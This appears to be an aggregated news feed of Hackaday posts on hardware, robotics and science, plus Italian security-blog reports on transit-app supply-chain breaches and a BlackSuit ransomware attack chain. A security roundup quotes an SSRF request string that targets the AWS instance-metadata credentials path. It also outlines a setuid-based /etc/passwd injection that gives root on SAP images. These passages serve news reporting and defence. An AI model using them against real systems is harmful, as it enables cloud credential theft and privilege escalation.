Most robots depend on controlled environments, because the real world is hard to get around in. The smaller the robot, the bigger this problem because little wheels (or legs) can take only little steps. One way around that is MIT’s latest one-legged hopping robot, which sports a set of four insect-like wings on its top end and can quickly pogo-hop its way across different terrain with ease.
The four wings provide lift, and steer the robot so that its single leg lands precisely.
The wings aren’t for flying in the usual sense. They provide lift, but also help the tiny device steer itself so that its hops land precisely. Earlier incarnations of one-legged hopping robots (like this one) accomplished this with propellers and electric motors, but traditional motors are a non-starter on a device that weighs less than a paperclip.

Right now, this little winged hopper is not completely self-contained (power and control systems are off-board) but running it as a tethered unit allows researchers to test and evaluate different, minimalistic ways for a machine to move around efficiently. And efficiency is the whole goal of going in this direction.

Certainly tiny flying drones already exist and get about in the real world just fine. But if one wants to shed mass, ditch conventional motors, and reduce cost and power consumption, this tiny winged hopping machine is one way to do it. And it can even carry payloads! The payloads are tiny, of course, but being able to haul around ten times one’s own weight and still function reliably is an impressive feat.

You can watch it in action in the video embedded just below the page break. Once you’ve watched that, we’d like to remind you that novel locomotion isn’t just the domain of hopping robots. Tiny robots with explosive joints is just as wild as it sounds.

youtube.com/embed/UlxQz8F59Hk?…

hackaday.com/2025/04/12/tiny-p…

Sound hardware has been built into PC motherboards for so long now it’s difficult to remember the days when a sound card was an expensive add-on peripheral. By the mid to late 1990s they were affordable and ubiquitous enough to be everywhere, but three decades later some of them are starting to fail. [Necroware] takes us through the repair of a couple of Creative Labs Sound Blaster 16s, which were the card to have back then.

The video below is a relaxed look at typical problems afflicting second-hand cards with uncertain pasts. There’s a broken PCB trace on the first one, which receives a neat repair. The second one has a lot more wrong with it though, and reveals some surprises. We would have found the dead 74 series chips, but we’re not so sure we’d have immediately suspected a resistor network as the culprit.

Watching these cards become sought-after in the 2020s is a little painful for those of us who were there at the time, because it’s certain we won’t be the only ones who cleared out a pile of old ISA cards back in the 2000s. If you find one today and don’t have an ISA slot, worry not, because you can still interface it via your LPC bus.

youtube.com/embed/J4djhBXUQ1I?…

hackaday.com/2025/04/12/repair…

Tuabruzzo informa i propri utenti di una recente violazione di dati personali che ha coinvolto il fornitore di servizi informatici MyCicero S.r.l., incaricato come Responsabile del trattamento dei dati.

La trasparenza nei confronti degli utenti è una priorità assoluta, motivo per cui è stato deciso di comunicare apertamente quanto accaduto. L’azienda sottolinea l’importanza di mantenere la fiducia, aggiornando tempestivamente tutti gli interessati.

l’APP Tua Abruzzo consente di acquistare biglietti e abbonamenti per spostarti con i mezzi pubblici in tutta la regione, consultare gli orari, organizzare il tuo viaggio, inserendo il punto di partenza e arrivo, e consultando tutte le soluzioni fra cui scegliere e avere sempre tutto a portata di mano, senza bisogno di titoli cartacei.

La violazione

Nei giorni scorsi, un attacco alla supply chain di MyCicero ha segnalato una violazione causata da attività malevole condotte da attori esterni non identificati che hanno preso di mira i loro server . Appena ricevuta la notifica dell’incidente, Tuabruzzo ha avviato tutte le verifiche necessarie per comprendere l’entità e l’impatto dell’evento.

Come misura immediata, l’accesso ai sistemi è stato sospeso temporaneamente per consentire interventi di sicurezza urgenti, motivo per cui alcuni utenti potrebbero aver riscontrato rallentamenti o problemi di accesso all’App.

Nonostante l’adozione di stringenti misure di protezione dei dati, la violazione potrebbe aver portato soggetti terzi non autorizzati a venire a conoscenza di informazioni personali degli utenti. Questo rappresenta un rischio importante, sebbene al momento non siano emerse evidenze di utilizzi illeciti dei dati sottratti. L’azienda, tuttavia, invita alla massima attenzione per eventuali comunicazioni sospette o richieste anomale.

Dalle analisi condotte, i dati che potrebbero essere stati compromessi comprendono informazioni di base come nome, cognome e indirizzo e-mail. Al momento non risulta coinvolta nessuna informazione sensibile o bancaria, ma Tuabruzzo continua a monitorare la situazione per intervenire tempestivamente in caso emergessero nuovi elementi.

A seguito dell’accaduto, sono state rafforzate le misure di sicurezza sui sistemi di gestione dati e sono in corso ulteriori controlli per prevenire futuri incidenti. Tuabruzzo resta a disposizione degli utenti per fornire supporto e chiarimenti, ribadendo il proprio impegno costante nella tutela della sicurezza delle informazioni personali.

Attacchi alla Supply Chain

In questo contesto storico, assistiamo sempre più spesso a perdite “collaterali” legate a problematiche nella supply chain. Non si tratta di esfiltrazioni che avvengono direttamente dalle infrastrutture IT delle aziende colpite, ma di violazioni che interessano terze parti e fornitori esterni con cui esse collaborano. Questo scenario mette in evidenza come oggi i fornitori rappresentino un vero e proprio “tallone d’Achille” per la cybersecurity aziendale. Non solo nella produzione, ma anche nella protezione dei dati e dei servizi digitali, è fondamentale prestare la massima attenzione a queste dinamiche.

Gli attacchi alla supply chain possono manifestarsi in molteplici forme: vulnerabilità nei sistemi, infezioni malware, oppure condotte scorrette da parte di dipendenti infedeli. Gli effetti possono essere devastanti, arrivando a causare fermi delle linee produttive e danni a catena su clienti, partner e reputazione aziendale.

Per questo motivo, le attività di controllo e monitoraggio non devono limitarsi alle sole infrastrutture IT interne, ma devono necessariamente estendersi anche ai sistemi tecnologici di partner e fornitori. È fondamentale prevedere nei contratti specifiche clausole che regolamentino gli standard minimi di sicurezza informatica da rispettare.

In un contesto dove ogni anello della catena può rappresentare una vulnerabilità, è indispensabile investire con decisione nella gestione del rischio della supply chain. Il nostro consiglio è di adottare misure concrete che prevedano il diritto di audit, consentendo così al cliente di effettuare controlli periodici sulla sicurezza, per verificare il rispetto dei requisiti stabiliti nei contratti di fornitura. Approfondire questi aspetti non è più un’opzione, ma una necessità strategica per ogni azienda. Questo viene anche richiesto nell’articolo 21 del NIS2che riporta che le entità devono adottare misure adeguate e proporzionate per valutare e gestire i rischi, compresi quelli relativi alla sicurezza delle catene di approvvigionamento, e garantiscono che i contratti con i fornitori includano clausole che permettano la verifica della conformità ai requisiti di sicurezza.

Infine, occorre ricordare che, nel momento in cui avviene una violazione, è quasi sempre il brand del cliente finale ad apparire sui giornali, mentre il fornitore coinvolto resta spesso in secondo piano. Un ulteriore motivo per cui la sicurezza nella catena di approvvigionamento non può essere trascurata.

Questo episodio evidenzia ancora una volta quanto gli attacchi alla supply chain possano avere effetti a cascata su più realtà aziendali. La violazione subita da MyCicero, infatti, non ha colpito solo l’App Tuabruzzo, ma ha avuto ripercussioni anche su ATM Milano, altro cliente del fornitore. Questa situazione dimostra quanto sia delicato l’equilibrio tra le infrastrutture IT dei fornitori di servizi e quelle delle terze parti che li utilizzano. La sicurezza dell’intero ecosistema digitale dipende dalla solidità di ogni singolo anello della catena: una vulnerabilità in un punto può propagarsi rapidamente, coinvolgendo più organizzazioni e aumentando esponenzialmente i rischi per utenti e aziende.

L'articolo Violazione Dati Personali dell’App Tua Abruzzo: Un ennesimo attacco alla Supply Chain proviene da il blog della sicurezza informatica.

ATM (acronimo di Azienda Trasporti Milanesi) ha informato i propri utenti di un incidente di sicurezza che ha coinvolto l’app ufficiale. Nella serata di sabato 5 aprile, la società Mooney Servizi S.p.A., responsabile della gestione tecnica della piattaforma e del trattamento dei dati personali degli utenti, ha subito un attacco informatico.

La notizia è stata immediatamente comunicata ad ATM, che ha iniziato a collaborare con Mooney per fronteggiare la situazione. In risposta all’attacco, la società ha tempestivamente isolato i sistemi compromessi, limitando così ulteriori accessi non autorizzati.

Cosa è successo

L’attacco ha portato alla violazione di alcuni dati personali degli utenti registrati all’app ATM. Le informazioni coinvolte riguardano dati anagrafici, di contatto e di profilo cliente. Fortunatamente, non sono stati compromessi dati particolarmente sensibili come le carte di credito, i bancomat, altri sistemi digitali di pagamento, né le credenziali di accesso all’app o gli indirizzi di domicilio o residenza degli utenti. Questo ha contribuito a contenere l’incidente sotto il profilo delle possibili conseguenze economiche.

Nonostante la natura limitata dei dati coinvolti, l’incidente comporta comunque un rischio legato alla perdita di riservatezza delle informazioni personali. In particolare, esiste la possibilità che i dati sottratti possano essere divulgati o utilizzati senza autorizzazione. Si invitano quindi le persone utenti dell’APP a prestare attenzione a eventuali comunicazioni sospette che potrebbero derivare da un uso improprio di queste informazioni.

A fronte della violazione, ATM si è subito attivata adottando una serie di misure urgenti. L’azienda ha chiesto a Mooney Servizi una reportistica aggiornata e dettagliata sulle misure di sicurezza implementate, per comprendere l’entità dell’attacco e garantire una risposta adeguata. Inoltre, sono stati immediatamente rafforzati i sistemi di sicurezza per proteggere ulteriormente i dati e prevenire nuovi tentativi di intrusione.

ATM conclude rassicurando gli utenti sul proprio impegno continuo per garantire la protezione dei dati personali. L’azienda sta lavorando a stretto contatto con Mooney Servizi e con le autorità competenti per monitorare la situazione e aggiornare tempestivamente gli utenti su eventuali sviluppi. La trasparenza e la tutela della privacy restano una priorità assoluta, in un contesto in cui le minacce informatiche si fanno purtroppo sempre più sofisticate.

L’ATM è una società per azioni di proprietà del comune di Milano, che gestisce il servizio di trasporto pubblico su un territorio che interessa oltre 3,3 milioni di abitanti e che comprende la città di Milano e 95 comuni della Lombardia.

Gestisce, inoltre, il controllo della sosta su strada, i parcheggi di interscambio, il servizio di bike sharing “BikeMi”, il Sistema Integrato del Traffico e del Territorio (“SCTT”) e le zone a traffico limitato “Area B” e “Area C” del capoluogo lombardo.

Attacchi alla Supply Chain

In questo contesto storico, assistiamo sempre più spesso a perdite “collaterali” legate a problematiche nella supply chain. Non si tratta di esfiltrazioni che avvengono direttamente dalle infrastrutture IT delle aziende colpite, ma di violazioni che interessano terze parti e fornitori esterni con cui esse collaborano. Questo scenario mette in evidenza come oggi i fornitori rappresentino un vero e proprio “tallone d’Achille” per la cybersecurity aziendale. Non solo nella produzione, ma anche nella protezione dei dati e dei servizi digitali, è fondamentale prestare la massima attenzione a queste dinamiche.

Gli attacchi alla supply chain possono manifestarsi in molteplici forme: vulnerabilità nei sistemi, infezioni malware, oppure condotte scorrette da parte di dipendenti infedeli. Gli effetti possono essere devastanti, arrivando a causare fermi delle linee produttive e danni a catena su clienti, partner e reputazione aziendale.

Per questo motivo, le attività di controllo e monitoraggio non devono limitarsi alle sole infrastrutture IT interne, ma devono necessariamente estendersi anche ai sistemi tecnologici di partner e fornitori. È fondamentale prevedere nei contratti specifiche clausole che regolamentino gli standard minimi di sicurezza informatica da rispettare.

In un contesto dove ogni anello della catena può rappresentare una vulnerabilità, è indispensabile investire con decisione nella gestione del rischio della supply chain. Il nostro consiglio è di adottare misure concrete che prevedano il diritto di audit, consentendo così al cliente di effettuare controlli periodici sulla sicurezza, per verificare il rispetto dei requisiti stabiliti nei contratti di fornitura. Approfondire questi aspetti non è più un’opzione, ma una necessità strategica per ogni azienda. Questo viene anche richiesto nell’articolo 21 del NIS2che riporta che le entità devono adottare misure adeguate e proporzionate per valutare e gestire i rischi, compresi quelli relativi alla sicurezza delle catene di approvvigionamento, e garantiscono che i contratti con i fornitori includano clausole che permettano la verifica della conformità ai requisiti di sicurezza.

Infine, occorre ricordare che, nel momento in cui avviene una violazione, è quasi sempre il brand del cliente finale ad apparire sui giornali, mentre il fornitore coinvolto resta spesso in secondo piano. Un ulteriore motivo per cui la sicurezza nella catena di approvvigionamento non può essere trascurata.

Questo episodio evidenzia ancora una volta quanto gli attacchi alla supply chain possano avere effetti a cascata su più realtà aziendali. La violazione subita da MyCicero, infatti, non ha colpito solo l’App Tuabruzzo, ma ha avuto ripercussioni anche su ATM Milano, altro cliente del fornitore. Questa situazione dimostra quanto sia delicato l’equilibrio tra le infrastrutture IT dei fornitori di servizi e quelle delle terze parti che li utilizzano. La sicurezza dell’intero ecosistema digitale dipende dalla solidità di ogni singolo anello della catena: una vulnerabilità in un punto può propagarsi rapidamente, coinvolgendo più organizzazioni e aumentando esponenzialmente i rischi per utenti e aziende.

L'articolo Un attacco alla Supply Chain colpisce L’Azienda Trasporti Milanesi ATM che lo comunica agli utenti proviene da il blog della sicurezza informatica.

Era una giornata qualsiasi quando un utente ignaro, probabilmente alle prese con una call imminente, ha visitato un sito che sembrava legittimamente legato a Zoom, la nota piattaforma per videoconferenze. Grafica perfetta, dominio plausibile, contenuti apparentemente autentici. Ma dietro quell’interfaccia rassicurante si celava una trappola perfettamente architettata. L’utente scarica quello che crede essere l’installer ufficiale dell’applicazione. Lo esegue. E senza rendersene conto, spalanca le porte a un attacco multi-fase che culminerà, nove giorni dopo, nella devastazione completa del suo ambiente aziendale.

È quanto accaduto recentemente in un attacco analizzato nel dettaglio da The DFIR Report, che ha portato all’infezione e alla crittografia completa di una rete aziendale da parte del ransomware BlackSuit.

Quello che seguirà è un viaggio all’interno di una kill chain articolata, dove ogni componente malevolo ha uno scopo ben definito e ogni passaggio è pensato per restare sotto il radar il più a lungo possibile. Un attacco in cui la pazienza è stata l’arma principale dell’attaccante, e dove la vera forza non stava nella velocità, ma nella silenziosa e metodica occupazione del perimetro digitale della vittima.

Fase uno: Initial Access e installazione del loader

Il primo passo dell’attacco è quello che, da sempre, si conferma tra i più efficaci e pericolosi: l’ingegneria sociale. L’attore minaccia ha creato un sito clone di Zoom, perfettamente curato, al punto da ingannare sia utenti comuni che utenti aziendali. Il file scaricato non è altro che un installer trojanizzato, apparentemente funzionante, ma che contiene al suo interno il primo componente malevolo della catena: d3f@ckloader.

Questo loader, come da definizione, non svolge direttamente attività offensive visibili, ma agisce come ponte verso i successivi payload. Una volta eseguito, instaura immediatamente una comunicazione cifrata con un server di comando e controllo (C2) e scarica componenti aggiuntivi. Tra questi, uno in particolare gioca un ruolo chiave nelle fasi iniziali dell’attacco: SectopRAT.

Fase due: accesso remoto e raccolta delle informazioni

SectopRAT (Remote Access Trojan) è uno strumento già noto nel panorama delle minacce, apprezzato dagli attori malevoli per la sua leggerezza e per l’ampia gamma di funzionalità che offre. Non solo permette l’accesso da remoto alla macchina infetta, ma include capacità di keylogging, cattura dello schermo, gestione dei file e monitoraggio delle attività dell’utente.

L’attaccante, sfruttando SectopRAT, inizia a mappare la rete, raccogliere informazioni sugli utenti, sulla configurazione delle macchine e sulle credenziali. Questa fase è cruciale: non si tratta ancora di un attacco visibile o distruttivo, ma di una fase silenziosa, dove ogni azione è mirata a costruire una conoscenza dettagliata dell’ambiente.

Dall’analisi del traffico e dei log, si osserva l’uso di numerose tecniche MITRE ATT&CK, tra cui:

• T1018 – Remote System Discovery, per identificare le macchine collegate alla rete.
• T1087.001 – Account Discovery: Local Account, per ottenere una panoramica degli utenti locali.
• T1047 – Windows Management Instrumentation, che consente interrogazioni e operazioni remote.
• T1003.001 – Credential Dumping: LSASS Memory, per l’estrazione di credenziali direttamente dalla memoria RAM del processo LSASS.

La tecnica del dump LSASS rappresenta un punto di svolta: consente all’attaccante di ottenere accesso privilegiato (local admin, domain admin) e preparare il terreno per il movimento laterale.

Fase tre: Post-Exploitation con strumenti avanzati

Dopo nove giorni di attività discreta, il gruppo cambia passo. Con le credenziali privilegiate in mano, l’attaccante carica due tra i più temuti strumenti di post-exploitation oggi in circolazione: Brute Ratel e Cobalt Strike.

• Brute Ratel è un framework offensivo moderno, progettato per evadere i sistemi EDR e rendere il rilevamento molto più difficile. Permette l’iniezione di payload in processi legittimi, il beaconing nascosto e tecniche sofisticate di mimetizzazione.
• Cobalt Strike, invece, è ormai un classico. I suoi beacon, distribuiti in varie macchine della rete, permettono all’attaccante di agire in parallelo, eseguire comandi, caricare moduli, elevare privilegi e avviare operazioni di lateral movement.

Viene inoltre attivato QDoor, un malware che funge da proxy per connessioni RDP, facilitando l’accesso a sistemi remoti attraverso tunnel cifrati. In questa fase l’attaccante dispone ormai di controllo totale sulla rete: può accedere, spostarsi, impersonare utenti e amministratori, raccogliere informazioni e prepararsi all’azione finale.

Fase quattro: esfiltrazione e fase d’impatto

Con i dati sotto controllo, si passa all’esfiltrazione, realizzata utilizzando il servizio cloud Bublup. Un sistema apparentemente innocuo, che consente la creazione di raccolte di file e note, ma che viene qui sfruttato per caricare informazioni sottratte: credenziali, configurazioni, dati sensibili.

Segue quindi il colpo finale: l’attivazione di BlackSuit, un ransomware moderno, veloce e altamente distruttivo. La diffusione del ransomware avviene tramite PsExec, strumento legittimo spesso abusato dai criminali informatici per propagare payload su tutte le macchine accessibili nella rete.

Il ransomware crittografa ogni file e lascia note di riscatto. L’azienda è ora completamente paralizzata. Tutto ciò è avvenuto nell’arco di 194 ore, ovvero circa otto giorni.

La mappa MITRE dei malware coinvolti

L’immagine allegata è una rappresentazione grafica e concettuale dell’attacco, che mostra le interrelazioni tra i malware coinvolti e le tecniche MITRE ATT&CK utilizzate. A sinistra e a destra, sono visualizzati i malware: da QDoor, BlackSuit e SectopRAT fino a Brute Ratel, Cobalt Strike e d3f@ckloader.

Al centro, in giallo, un fitto reticolo di tecniche evidenzia la complessità e l’intenzionalità dell’attacco. Tecniche come:

• T1105 – Ingress Tool Transfer, per il caricamento di payload.
• T1059.001 – PowerShell, per esecuzioni silenziose.
• T1560.001 – Archive Collected Data: Archive via Utility, usata per impacchettare i dati prima dell’esfiltrazione.
• T1021.002 – Remote Services: SMB/Windows Admin Shares, chiave nel movimento laterale.
• T1486 – Data Encrypted for Impact, la tecnica conclusiva del ransomware.

Questa mappa non è solo una fotografia, ma una radiografia strategica: dimostra come gli attori malevoli sfruttino in modo modulare strumenti diversi, ognuno specializzato in un compito preciso. La sovrapposizione delle tecniche mostra che questi strumenti condividono obiettivi comuni, e che l’attacco non è un evento isolato, ma il risultato di una pianificazione attenta e raffinata.

Considerazioni finali

Ciò che colpisce di più in questo attacco non è la sua violenza finale, bensì la pazienza e l’intelligenza operativa con cui è stato condotto. L’inizio silenzioso, il tempo dedicato alla scoperta, il furto metodico delle credenziali, la distribuzione strategica dei beacon e infine la detonazione del ransomware: ogni fase è stata eseguita con precisione chirurgica.

In questo scenario, le contromisure devono evolversi. Nessuna soluzione può da sola impedire un attacco così strutturato: serve un approccio stratificato, che includa EDR/XDR efficaci, segmentazione di rete, formazione continua del personale, una gestione attenta delle credenziali e soprattutto una visione strategica della sicurezza.

Perché in guerra, come in cybersecurity, chi si prepara meglio, vince.

L'articolo Dall’inganno di Zoom al disastro ransomware: viaggio nel cuore dell’attacco BlackSuit proviene da il blog della sicurezza informatica.

One of the delights in Bash, zsh, or whichever shell tickles your fancy in your OSS distribution of choice, is the ease of which you can use scripts. These can be shell scripts, or use the Perl, Python or another interpreter, as defined by the shebang (#!) at the beginning of the script. This signature is followed by the path to the interpret, which can be /bin/sh for maximum compatibility across OSes, but how does this actually work? As [Bruno Croci] found while digging into this question, it is not the shell that interprets the shebang, but the kernel.

It’s easy enough to find out the basic execution sequence using strace after you run an executable shell script with said shebang in place. The first point is in execve, a syscall that gets one straight into the Linux kernel (fs/exec.c). Here the ‘binary program’ is analyzed for its executable format, which for the shell script gets us to binfmt_script.c. Incidentally the binfmt_misc.c source file provides an interesting detour as it concerns magic byte sequences to do something similar as a shebang.

As a bonus [Bruno] also digs into the difference between executing a script with shebang or running it in a shell (e.g. sh script.sh), before wrapping up with a look at where the execute permission on a shebang-ed shell script is checked.

hackaday.com/2025/04/11/tracin…

Human biology is very much like that of other mammals, and yet so very different in areas where it matters. One of these being human neurology, with aspects like the human brain and the somatosensory pathways (i.e. touch etc.) being not only hard to study in non-human animal analogs, but also (genetically) different enough that a human test subject is required. Over the past years the use of human organoids have come into use, which are (parts of) organs grown from human pluripotent stem cells and thus allow for ethical human experimentation.

For studying aspects like the somatosensory pathways, multiple of such organoids must be combined, with recently [Ji-il Kim] et al. as published in Nature demonstrating the creation of a so-called assembloid. This four-part assembloid contains somatosensory, spinal, thalamic and cortical organoids, covering the entirety of such a pathway from e.g. one’s skin to the brain’s cortex where the sensory information is received.

Such assembloids are – much like organoids – extremely useful for not only studying biological and biochemical processes, but also to research diseases and disorders, including tactile deficits as previously studied in mouse models by e.g. [Lauren L. Orefice] et al. caused by certain genetic mutations in Mecp2 and other genes, as well as genes like SCN9A that can cause clinical absence of pain perception.

Using these assembloids the development of these pathways can be studied in great detail and therapies developed and tested.

hackaday.com/2025/04/11/creati…

Over on the Google blog [Joel Meares] explains how Google built the new family of Gemini Robotics models.

The bi-arm ALOHA robot equipped with Gemini 2.0 software can take general instructions and then respond dynamically to its environment as it carries out its tasks. This family of robots aims to be highly dexterous, interactive, and general-purpose by applying the sort of non-task-specific training methods that have worked so well with LLMs, and applying them to robot tasks.

There are two things we here at Hackaday are wondering. Is there anything a robot will never do? And just how cherry-picked are these examples in the slick video? Let us know what you think in the comments!

youtube.com/embed/4MvGnmmP3c0?…

hackaday.com/2025/04/11/gemini…

There are some ideas which someone somewhere has to try. Take [Uri Tuchman]’s foot mouse. It’s a computer mouse for foot operation, but it’s not just a functional block. Instead it’s an ornate inlaid-wood-and-brass affair in the style of a very fancy piece of antique footwear.

The innards of an ordinary USB mouse are placed in something best described as a wooden platform heel, upon which is placed a brass sole with a couple of sections at the front to activate the buttons with the user’s toes. The standout feature is the decoration. With engraving on the brass and inlaid marquetry on the wood, it definitely doesn’t look like any computer peripheral we’ve seen.

The build video is below the break, and we’re treated to all the processes sped up. At the end he uses it in a basic art package and in a piloting game, with varying degrees of succes. We’re guessing it would take a lot of practice to gain a level of dexterity with this thing, but we salute him for being the one who tries it.

This has to be the fanciest peripheral we’ve ever seen, but surprisingly it’s not the first foot mouse we’ve brought you.

youtube.com/embed/Lqgbl6JoYoQ?…

hackaday.com/2025/04/11/a-mous…

GPS and similar satellite navigation systems revolutionized how you keep track of where you are and what time it is. However, it isn’t without its problems. For one, it generally doesn’t work very well indoors or in certain geographic or weather scenarios. It can be spoofed. Presumably, a real or virtual attack could take the whole system down.

Addressing these problems is a new system called Broadcast Positioning System (BPS). It uses upgraded ATSC 3.0 digital TV transmitters to send exact time information from commercial broadcast stations. With one signal, you can tell what time it is within 100 ns 95% of the time. If you can hear four towers, you can not only tell the time, but also estimate your position within about 100 m.

The whole thing is new — we’ve read that there are only six transmitters currently sending such data. However, you can get a good overview from these slides from the National Association of Broadcasters. They point out that the system works well indoors and can work with GPS, help detect if GPS is wrong, and stand in for GPS if it were to go down suddenly.

If all digital TV stations adopt this, the presentation mentions that there would be 516 VHF stations operating with up to 10 kW over two widely separated bands. That adds to 1,526 UHF stations running between 100 kW to 1000 kW. So lots of power and very diverse in terms of frequencies. Coverage is spotty in some parts of the country, though. A large part of the western United States would lack visibility of the four stations required for a position fix. Of course, currently there are only five or six stations, so this is theoretical at this point.

The Real Story

If you read the slide deck, the real story is at the end in the backup slides. That shows the ATSC standard frame and how the preamble changes. The math is fairly standard stuff. You know where the stations are, you know what time they think they sent the signal, and you can estimate the range to each station. With three or four stations, you can get a good idea of where you must be based on the relative receive times.

The stations diversify their time sources, which helps guard against spoofing. For example, they may get time information from GPS, the network, a local atomic clock, and even neighboring stations, and use that to create an accurate local time that they send out with their signal.

Learn More

Most of the slides come from more detailed white papers you can find on the NAB website. A lot of the site is dedicated to explaining why you can’t live without GPS, but you can’t depend on it, either. The bottom right part of the page has the technical papers you’ll probably be more interested in.

GPS is an impressive system, but we know it needs some help. BPS reminded us a bit of LORAN.

hackaday.com/2025/04/11/gps-br…

Join Hackaday Editors Elliot Williams and Tom Nardi as they talk about the best stories and hacks of the week. This episode starts off with a discussion of the Vintage Computer Festival East and Philadelphia Maker Faire — two incredible events that just so happened to be scheduled for the same weekend. From there the discussion moves on to the latest developments in DIY soft robotics, the challenge of running Linux on 8-pin ICs, hardware mods to improve WiFi reception on cheap ESP32 development boards, and what’s keeping old smartphones from being reused as general purpose computers.

You’ll also hear about Command and Conquer: Red Alert running on the Pi Pico 2, highly suspect USB-C splitters, and producing professional looking PCBs at home with a fiber laser. Stick around to the end to hear about the current state of non-Google web browsers, and a unique new machine that can engrave circuit boards with remarkable accuracy.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

As always, the Hackaday Podcast is available as a DRM-free MP3 download.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 316 Show Notes:

News:

• Celebrating 30 Years Of Windows 95 At VCF
• In 2025, The Philly Maker Faire Finds Its Groove

What’s that Sound?

• Congratulations to [laserkiwi] for winning a Hackaday Podcast t-shirt!

Interesting Hacks of the Week:

• Salamander Robot Is Squishy
  
  • The Future of Robots is Soft (and Squishy!) – YouTube
  • These Electronics-free Robots Can Walk Right Off the 3D-Printer
  • FlowIO Platform

  
  

• 8 Pins For Linux
  
  • Building The Worst Linux PC Ever

  
  

• Simple Antenna Makes For Better ESP32-C3 WiFi
  
  • ESP32 Range Extender / Antenna Modification

  
  

• LayerLapse Simplifies 3D Printer Time-lapse Shots
• Turning Old Cellphones Into SBCs
  
  • IOIO – Wikipedia

  
  

• Ben Eater Vs. Microsoft BASIC
  
  • A Very Trippy Look At Microsoft’s Beginnings

  
  

Quick Hacks:

• Elliot’s Picks:
  
  • A Tiny Tape Synth
  • If You’re 3D Scanning, You’ll Want A Way To Work With Point Clouds
  • Why USB-C Splitters Can Cause Magic Smoke Release

  
  

• Tom’s Picks:
  
  • Tracking The ISS Made Easy
  • Command And Conquer Ported To The Pi Pico 2
  • Fiber Laser Gives DIY PCBs A Professional Finish

  
  

Can’t-Miss Articles:

• Which Browser Should I Use In 2025?
  
  • qutebrowser

  
  

• Supercon 2024: Quick High-Feature Boards With The Circuit Graver

hackaday.com/2025/04/11/hackad…

If you are a visual thinker, you might enjoy [AIHVHIA’s] recent video, which shows the effect of applying audio processing to text displayed on an oscilloscope. The video is below.

Of course, this presupposes you have some way to display text on an oscilloscope. Audio driving the X and Y channels of the scope does all the work. We aren’t sure exactly how he’s doing that, but we suspect it is something like Osci-Render.

Does this have any value other than art? It’s hard to say. Perhaps the effect of panning audio on text might give you some insight into your next audio project. Incidentally, panning certainly did what you would expect it to do, as did the pass filters. But some of the effects were a bit surprising. We still want to figure out just what’s happening with the wave folder.

If text isn’t enough for you, try video. Filtering that would probably be pretty entertaining, too. If you want to try your own experiments, we bet you could do it all — wave generation and filtering — in GNU Radio.

youtube.com/embed/47jlny15IEc?…

hackaday.com/2025/04/11/audio-…

AI continues to be used in new and exciting ways… like generating spam messages. Yes, it was inevitable, but we now have spammers using LLM to generate unique messages that don’t register as spam. AkiraBot is a Python-powered tool, designed to evade CAPTCHAs, and post sketchy SEO advertisements to web forms and chat boxes around the Internet.

AkiraBot uses a bunch of techniques to look like a legitimate browser, trying to avoid triggering CAPTCHAs. It also runs traffic through a SmartProxy service to spread the apparent source IP around. Some captured logs indicate that of over 400,000 attempted victim sites, 80,000 have successfully been spammed.

SSRF Attacking AWS

March brought a spike in instances of an interesting EC2 attack. F5 labs has the details, and it’s really pretty simple. Someone is sending requests ending in /?url=hxxp://169.254.169.254/latest/meta-data/iam/security-credentials/, with the hope that the site is vulnerable to a Server Side Request Forgery (SSRF).

That IP address is an interesting one. It’s the location where Amazon EC2 makes the Instance Metadata Service available (IMDSv1). Version 1 of this service completely lacks authentication, so a successful SSRF can expose whatever information that service makes available. And that can include AWS credentials and other important information. The easiest fix is to upgrade the instance to IMDSv2, which does have all the authentication features you’d expect.

SAP and setuid

Up next is this Anvil Secure report from [Tao Sauvage], about finding vulnerable setuid binaries in the SAP Linux images.

Setuid is a slightly outdated way to allow a less-privileged user to run a binary with elevated privileges. The simplest example is ping, which needs raw socket access to send special ICMP packets. The binary is launched by the user, escalates its privileges to send the packet, and then terminates without actually breaking the security barrier. At least that’s what is supposed to happen. In reality, setuid binaries are a consistent source of privilege escalation problems on Linux. So much so, that it’s now preferred to use the capabilities functionality to achieve this. But that’s fairly new, and many distros just give binaries like ping the setuid bit.

This brings us to SAP’s Linux images, like SAP HANA Express. These images include a small collection of custom setuid binaries, with icmbnd and hostexecstart catching our researcher’s eyes. icmbnd notably has the -f flag to specify the output file for a debug trace. That’s a typical setuid problem, in that a user can specify an oddball location, and the binary will change the system’s state in unexpected ways. It’s an easy denial of service attack, but is there a way to actually get root? It turns out the the Linux /etc/passwd file is particularly resilient. Lines that don’t make any sense as password entries are just ignored. Inject a pair of newlines and a single valid passwd entry into the passwd file, and you too can be root on an SAP system.

The hostexecstart vulnerability is a bit more involved. That binary starts and stops the SAP Host Agent on the system. That would be a dead end, except it can also take a SAR archive and upgrade the system agent. [Tao] chased a couple of dead ends regarding library injection and SAR archive signing, before finally using another standard setuid technique, the symbolic link. In this case, link the /etc/passwd file to the local sapcar_output location, and include a malicious passwd line inside a cooked SAR archive. hostexecstart tries to unpack the archive, and outputs the log right into the local sapcar_output file. But that file is really a symbolic link, and it once again clobbers passwd.

Google’s Take on End-to-end-encryption

We’re fans of end-to-end encryption around here. If Alice had a message that’s only intended for Bob to see, then it seems only right that Bob is really the only one that can read the message. The reality of modern cryptography is that this is 100% possible via RSA encryption, and the entire variety of asymmetric encryption schemes that followed. The problem with actually using such encryption is that it’s a pain. Between managing keys, getting an email client set up properly, and then actually using the system in practice, end-to-end asymmetric encryption is usually just not worth the hassle for everyday people.

Google feels that pain, and is bringing easy end-to-end encryption to business Gmail accounts. Except, it’s not actually asymmetric encryption. This works using the key access control list (KACL). Here Alice writes a message, and asks the KACL server for a key to use to send it to Bob. The server provides a symmetric key, and Alice encrypts the message. Then when Bob receives the message, he asks the same server for the same key, and the server provides it, allowing him to decrypt the message.

So is this actually end-to-end encryption? Yes, but also no. While this solution does mean that Google never has the key needed to decrypt the message, it also means that whoever is running the KACL server does have that key. But it is better than the alternative. And the technique in use here could be adapted to make true symmetric encryption far easier for end users.

Ivanti Connect Active Exploit

Google’s Mandiant has announced that Ivanti Connect Secure boxes are under active exploitation via an n-day exploit. This is a buffer overflow that Ivanti discovered internally, and patched in February of this year. The overflow was considered to be strictly limited to denial of service, as the characters written to memory could only be digits and the dot symbol. If that sounds like an IP address, just hang on, and we’ll get there.

